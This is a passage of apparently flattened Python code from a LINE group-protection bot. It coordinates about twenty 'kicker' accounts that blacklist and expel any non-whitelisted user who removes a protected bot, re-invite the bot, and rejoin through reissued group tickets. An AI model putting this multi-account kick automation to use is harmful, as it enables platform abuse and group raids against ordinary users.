kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
G = kicker15.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.updateGroup(G)
Ticket = kicker15.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker15.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker15.updateGroup(G)
Ticket = kicker15.reissueGroupTicket(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker11.acceptGroupInvitation(op.param1)
except:
pass
return
if ga2 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
G = kicker16.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.updateGroup(G)
Ticket = kicker16.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker16.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker16.updateGroup(G)
Ticket = kicker16.reissueGroupTicket(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker12.acceptGroupInvitation(op.param1)
except:
pass
return
if ga3 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
G = kicker17.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.updateGroup(G)
Ticket = kicker17.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker17.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker17.updateGroup(G)
Ticket = kicker17.reissueGroupTicket(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker13.acceptGroupInvitation(op.param1)
except:
pass
return
if ga4 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
G = kicker18.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.updateGroup(G)
Ticket = kicker18.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker18.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker18.updateGroup(G)
Ticket = kicker18.reissueGroupTicket(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker14.acceptGroupInvitation(op.param1)
except:
pass
return
if ga5 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
G = kicker19.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.updateGroup(G)
Ticket = kicker19.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker19.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker19.updateGroup(G)
Ticket = kicker19.reissueGroupTicket(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker15.acceptGroupInvitation(op.param1)
except:
pass
return
if ga6 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
G = kicker20.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.updateGroup(G)
Ticket = kicker20.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker20.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker20.updateGroup(G)
Ticket = kicker20.reissueGroupTicket(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker16.acceptGroupInvitation(op.param1)
except:
pass
return
if ga7 in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker17.acceptGroupInvitation(op.param1)
except:
try:
G = kicker.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.updateGroup(G)
Ticket = kicker.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
